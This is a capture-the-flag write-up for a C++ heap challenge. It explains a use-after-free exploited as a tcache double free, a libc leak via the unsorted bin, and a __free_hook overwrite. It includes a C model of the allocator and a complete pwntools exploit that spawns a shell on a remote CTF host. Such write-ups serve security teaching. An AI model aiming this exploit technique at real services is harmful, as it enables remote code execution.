ciscn2019-c06

I watched this one get solved from the seat next to machine 5 at the national finals; machine 5 is way too strong.

Brief analysis

welcome to babyheap
1. add
2. remove
choice >

The program is written in C++ and offers only two operations, add and remove. add prints the address of the chunk it just allocated ("gift :"), and remove frees a chunk without clearing the stored pointer, so the same index can be freed again: a UAF that we use as a tcache double free (the libc shipped with the challenge predates the tcache double-free check, so tcache_put accepts the second free without complaint).

On top of that, the C++ runtime allocates a large chunk on the heap before the program's first add; the author attributes it to cin/cout, and the 0x11c20 offset used in the exploit matches the 0x11c10-byte emergency exception pool that libstdc++ allocates right after tcache_perthread_struct, so chunk 0 sits directly behind it. The plan is to use a tcache double free to make add hand out that chunk, then free it: its size is far above the tcache limit, so it goes straight into the unsorted bin with fd = bk = main_arena+0x60. A second tcache double free is then pointed at the same chunk. tcache_get takes the next pointer from the first 8 bytes of whatever it returns, so once the unsorted chunk has been handed out from the tcache, the following malloc of that size returns its fd, i.e. main_arena+0x60, and add prints it as the gift. That is the libc leak. Each stage uses a fresh size class (0x20, 0x30, 0x40) because the head of the bin it poisoned is left pointing at garbage.

After that it is the usual __free_hook overwrite: one more tcache double free, poison next with the address of __free_hook, allocate until malloc returns it, write the address of system there, and free the chunk whose content is /bin/sh. One caveat: the add that receives main_arena+0x60 also writes its content there (over the arena's top pointer); the exploit gets away with this because every later allocation is served from the tcache or carved out of the freed pool chunk, never from top.
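To make the leak mechanism concrete, here is a small C model of the allocation sequence above. It is an added illustration, not the challenge binary, the author's exploit or glibc: it imitates just enough of glibc 2.27 malloc (a tcache whose lists are linked through the first 8 bytes of user data and have no double-free check, an unsorted bin for oversize chunks, a fake main_arena with the 2.27 field layout) to show why add(9) receives main_arena+0x60. The heap array, the arena struct, the pool size and every function name are hypothetical stand-ins, and no double free touches the host's real libc, so it runs unchanged on any glibc version. The __free_hook stage is the same poisoning primitive aimed at a different address and is not repeated.

```c
/* Model of the ciscn_final_3 leak (added illustration, not the challenge
 * binary and not glibc).  Everything below is a hypothetical stand-in for
 * the glibc 2.27 structures the exploit abuses. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TCACHE_MAX 0x408              /* largest chunk size tcache accepts */
#define NBINS 64
static _Alignas(16) uint8_t heap[0x20000];
static size_t top;                    /* bump pointer for fresh chunks */
static uint8_t *tcache[NBINS];        /* one LIFO list per size class */

/* fake main_arena: `top` lives at +0x60 like in glibc 2.27, the unsorted
 * bin's fd/bk at +0x70; unsorted_chunks(av) is the address main_arena+0x60 */
static struct {
  uint8_t header[0x60];               /* mutex, flags, fastbinsY ... */
  uint8_t *top_chunk;                 /* main_arena+0x60: what the gift leaks */
  uint8_t *last_remainder;
  uint8_t *bins[2];                   /* unsorted bin: fd, bk */
} arena;
#define UNSORTED_CHUNKS ((uint8_t *)&arena + 0x60)

static uint8_t *get_ptr(const uint8_t *at) { uint8_t *p; memcpy(&p, at, sizeof p); return p; }
static void put_ptr(uint8_t *at, const void *p) { memcpy(at, &p, sizeof p); }
static size_t chunk_size(const uint8_t *user) { size_t s; memcpy(&s, user - 8, sizeof s); return s & ~(size_t)7; }
static size_t tc_idx(size_t csz) { return (csz - 0x20) / 0x10; }

static uint8_t *m_malloc(size_t req) {
  size_t csz = (req + 8 + 15) & ~(size_t)15;
  if (csz < 0x20) csz = 0x20;
  if (csz <= TCACHE_MAX && tcache[tc_idx(csz)]) {
    uint8_t *e = tcache[tc_idx(csz)];
    tcache[tc_idx(csz)] = get_ptr(e);   /* tcache_get: trusts e->next blindly */
    return e;
  }
  uint8_t *user = heap + top + 16;      /* fresh chunk: 16-byte header, then user data */
  size_t hdr = csz | 1;
  memcpy(user - 8, &hdr, sizeof hdr);
  top += csz;
  return user;
}

static void m_free(uint8_t *user) {
  size_t csz = chunk_size(user);
  if (csz <= TCACHE_MAX) {              /* tcache_put, 2.27 style: no double-free check */
    put_ptr(user, tcache[tc_idx(csz)]);
    tcache[tc_idx(csz)] = user;
    return;
  }
  /* oversize chunk goes to the unsorted bin: fd = bk = main_arena+0x60 */
  put_ptr(user, UNSORTED_CHUNKS);
  put_ptr(user + 8, UNSORTED_CHUNKS);
  arena.bins[0] = arena.bins[1] = user - 16;
}

/* Replay add()/delete() calls 0..9 of the exploit; returns the pointer
 * add(9)'s "gift :" would print. */
uint8_t *run_leak(void) {
  memset(heap, 0, sizeof heap); memset(tcache, 0, sizeof tcache); top = 0;
  uint8_t *pool = m_malloc(0x11c00);    /* stand-in for the 0x11c10 chunk the C++ runtime makes at startup */
  uint8_t *chunk0 = m_malloc(0x70);     /* add(0): "/bin/sh" */
  uint8_t *leakchunk = chunk0 - 0x11c20;/* same arithmetic as the exploit */
  if (leakchunk != pool - 0x10) return NULL;   /* model layout must reproduce the offset */

  uint8_t *c1 = m_malloc(0x10);         /* add(1) */
  m_free(c1); m_free(c1);               /* delete(1) x2: tcache[0x20] = c1 -> c1 */
  put_ptr(m_malloc(0x10), leakchunk + 0x10);   /* add(2): poison next -> pool user data */
  m_malloc(0x10);                       /* add(3): c1 again, list head is now the pool */
  uint8_t *c4 = m_malloc(0x10);         /* add(4): tcache hands out the pool */
  uint8_t *c5 = m_malloc(0x20);         /* add(5): fresh 0x30 chunk */
  m_free(c4);                           /* delete(4): 0x11c10 -> unsorted bin, fd = main_arena+0x60 */
  m_free(c5); m_free(c5);               /* delete(5) x2 */
  put_ptr(m_malloc(0x20), leakchunk + 0x10);   /* add(6): poison the 0x30 list -> pool */
  m_malloc(0x20);                       /* add(7): c5 again, head = pool */
  m_malloc(0x20);                       /* add(8): returns pool, head = pool->fd */
  return m_malloc(0x20);                /* add(9): returns pool->fd == main_arena+0x60 */
}

int main(void) {
  uint8_t *gift = run_leak();
  printf("gift : %p  (fake main_arena+0x60 is %p)\n", (void *)gift, (void *)UNSORTED_CHUNKS);
  return gift == UNSORTED_CHUNKS ? 0 : 1;
}
```

The important line is the one in m_malloc that loads the next pointer from the chunk being returned: the real tcache_get does exactly that, and it is the only reason a pointer into main_arena ever comes back from malloc and gets printed.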

EXP

from pwn import *

#sh = process('./ciscn_final_3.dms')
libc = ELF('./libc.so.6')
sh = remote("f.buuoj.cn",20232)

def add(index, size, s):
    sh.sendlineafter('choice >', '1')
    sh.sendlineafter('input the index', str(index))
    sh.sendlineafter('input the size', str(size))
    sh.sendafter('now you can write something', s)   # the program then prints "gift :<address>"

def delete(index):
    sh.sendlineafter('choice >', '2')
    sh.sendlineafter('input the index', str(index))  # pointer is not cleared, so this can repeat

# chunk 0 holds "/bin/sh" for the final free(); its address locates the heap
add(0,0x70,"/bin/sh\x00")
sh.recvuntil("gift :")
chunk0addr=int(sh.recv(14),16)          # "0x" + 12 hex digits
leakchunk=chunk0addr-0x11c20            # header of the big chunk the C++ runtime allocated before chunk 0
log.success("leakchunkaddr: "+hex(leakchunk))

# stage 1: tcache double free in the 0x20 bin, poison next -> user data of the big chunk
add(1,0x10,"1")
delete(1)
delete(1)
add(2,0x10,p64(leakchunk+0x10))
add(3,0x10,'3')
add(4,0x10,'leakchunk1')                # tcache now hands out the big chunk
add(5,0x20,'5')
delete(4)                               # big chunk -> unsorted bin, fd = main_arena+0x60

# stage 2: same trick in the 0x30 bin, so that malloc returns the unsorted chunk's fd
delete(5)
delete(5)
add(6,0x20,p64(leakchunk+0x10))
add(7,0x20,'7')
add(8,0x20,'8')                         # returns the big chunk again; tcache head = its fd
add(9,0x20,'leakchunk2')                # malloc returns main_arena+0x60 and add prints it
sh.recvuntil("gift :")
leakchunk2addr=int(sh.recv(14),16)      # main_arena+0x60
freehook=leakchunk2addr+0x1c48          # distance from main_arena+0x60 to __free_hook in this libc
log.success("freehook: "+hex(freehook))
system=freehook-libc.sym['__free_hook']+libc.sym['system']
log.success("system: "+hex(system))

# stage 3: tcache double free in the 0x40 bin, poison next -> __free_hook, write system there
add(10,0x30,'10')
delete(10)
delete(10)
add(11,0x30,p64(freehook))
add(12,0x30,'12')
add(13,0x30,p64(system))
delete(0)                               # free("/bin/sh") -> system("/bin/sh")
#gdb.attach(sh)
sh.interactive()